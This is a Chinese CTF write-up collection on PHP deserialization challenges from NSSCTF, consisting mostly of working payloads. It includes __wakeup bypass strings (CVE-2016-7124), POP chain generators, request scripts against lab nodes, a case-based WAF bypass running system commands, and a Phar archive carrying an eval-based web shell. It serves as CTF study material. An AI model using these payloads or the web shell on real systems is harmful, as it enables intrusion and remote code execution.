Web入门-PHP反序列化漏洞
[SWPUCTF 2021 新生赛]no_wakeup
反序列化时触发__wakeup
函数,考虑绕开。
1 2 3 4 5
| $aa = new HaHaHa(); $aa->admin = "admin"; $aa->passwd = "wllm"; $stus = serialize($aa); print_r($stus);
|
CVE-2016-7124:当参数列表中成员个数与实际不符时绕过__wakeup
函数,构造:
1
| O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}
|
payload:
1 2 3
| import requests response=requests.get('http://node4.anna.nssctf.cn:28398/class.php?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}') print(response.text[-44:])
|
[SWPUCTF 2021 新生赛]pop
找链子打。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
| <?php class w44m{ private $admin='w44m'; protected $passwd='08067'; } class w22m{ public $w00m; } class w33m{ public $w00m; public $w22m; } $a=new w22m(); $b=new w33m(); $c=new w44m(); $a->w00m=$b; $b->w00m=$c; $b->w22m='Getflag'; echo urlencode(serialize($a)); ?>
|
exp:
1 2 3
| import requests response1=requests.get('http://node5.anna.nssctf.cn:28507/index.php?w00m=O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D') print(response1.text[-44:])
|
[HUBUCTF 2022 新生赛]checkin
弱比较,true跟谁比都为true。
1 2 3 4 5 6 7 8
| <?php $a=array( 'username'=>true, 'password'=>true ); $b=serialize($a); echo $b; ?>
|
payload:
1
| http://node5.anna.nssctf.cn:28305/?info=a:2:{s:8:"username";b:1;s:8:"password";b:1;}
|
[NISACTF 2022]babyserialize
PHP魔术方法:
__wakeup()
:unserialize
被调用时。
__call()
:调用不可访问或不存在的方法。
__toString()
:类被转换成字符串。
__invoke()
:以函数方式调用对象。
__set()
:给不可访问或不存在属性赋值。
有俩坑:$fun
必须改为别的,要不总是进入hint()
;命令执行有WAF,可大小写绕过。
1 2 3 4 5 6 7 8
| $payload=new TianXiWei(); $payload->ext=new Ilovetxw(); $payload->ext->huang=new four(); $payload->ext->huang->a=new Ilovetxw(); $payload->ext->huang->a->su=new NISA(); $payload->ext->huang->a->su->fun="asdf"; $payload->ext->huang->a->su->txw4ever='System("cat /fllllllaaag");'; echo(urlencode(serialize($payload)));
|
[NISACTF 2022]bingdundun~
构造Phar,打包后.phar文件其实就是个类似.jar的压缩文件,里面有个67.php,内容为payload:
1 2 3 4 5 6 7 8
| <?php $payload='<?php @eval($_POST["cmd"]);?>'; $phar=new Phar("/home/monoceros406/Desktop/CTF-Workbench/example.phar"); $phar->startBuffering(); $phar->setStub("<?php __HALT_COMPILER();?>"); $phar->addFromString("67.php","$payload"); $phar->stopBuffering(); ?>
|
Phar伪协议不看后缀名,可改成.zip上传,伪协议看setStub的内容来识别。
上传后访问:
1
| http://node5.anna.nssctf.cn:28678/?bingdundun=phar://0f2c819eaf2a6ec7a8b16be40c7413e5.zip/67.php
|
Antsword连即可。
[SWPUCTF 2022 新生赛]1z_unserialize
1
| nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
|
[SWPUCTF 2022 新生赛]ez_ez_unserialize
反序列化构造过长链子绕过__wakeup
,exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
| <?php class X{ public $x = __FILE__; function __construct($x){ $this->x = $x; } function __wakeup(){ if ($this->x !== __FILE__) { $this->x = __FILE__; } } function __destruct(){ highlight_file($this->x); } } $a=new X("fllllllag.php"); echo(urlencode(serialize($a))); ?>
|
更改类“X”的长度更大,而不是更改类的个数,即更改大括号前的数字。
[NISACTF 2022]popchains
protected
型变量直接类内赋值。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42
| <?php class Road_is_Long{ public $page; public $string; public function __construct($file='index.php'){ $this->page = $file; } public function __toString(){ return $this->string->page; } public function __wakeup(){ if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) { echo "You can Not Enter 2022"; $this->page = "index.php"; } } } class Try_Work_Hard{ protected $var="/flag"; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Make_a_Change{ public $effort; public function __construct(){ $this->effort = array(); } public function __get($key){ $function = $this->effort; return $function(); } } $payload1=new Road_is_Long(); $payload1->page=new Road_is_Long(); $payload1->page->string=new Make_a_Change(); $payload1->page->string->effort=new Try_Work_Hard(); echo(urlencode(serialize($payload1))); ?>
|
[第五空间 2021]pklovecloud
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40
| <?php include 'flag.php'; class pkshow{ function echo_name(){ return "Pk very safe^.^"; } } class acp{ protected $cinder; public $neutron; public $nova; function __construct(){ $this->cinder=new ace; } function __toString(){ if(isset($this->cinder)) return $this->cinder->echo_name(); } } class ace{ public $filename="../nssctfasdasdflag"; public $openstack; public $docker=NULL; function echo_name(){ $this->openstack=unserialize($this->docker); $this->openstack->neutron=$heat; if($this->openstack->neutron===$this->openstack->nova){ $file="./{$this->filename}"; if(file_get_contents($file)){ return file_get_contents($file); } else{ return "keystone lost~"; } } } } $payload1=new acp(); echo(urlencode(serialize($payload1))); ?>
|